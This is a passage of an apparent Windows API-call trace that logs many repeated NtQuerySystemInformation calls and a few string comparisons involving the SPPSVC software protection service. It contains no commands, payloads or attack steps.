Length=0x38, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0231.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.314] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x20, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf10, Length=0x20, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x38, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.317] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x20, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd578, Length=0x50, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.320] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x28, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x28, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0231.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3c0, Length=0x28, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.324] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a0, Length=0x38, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x20, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2b0, Length=0x20, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.325] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd420, Length=0x50, ResultLength=0x0) [0231.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0231.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x38, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.333] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.334] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0231.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.336] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd408, Length=0x50, ResultLength=0x0) [0231.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0231.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0231.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.342] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x38, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.343] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd690, Length=0x28, ResultLength=0x0) [0231.389] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd718, Length=0x50, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd600, Length=0x50, ResultLength=0x0) [0231.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd580, Length=0x28, ResultLength=0x0) [0231.390] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 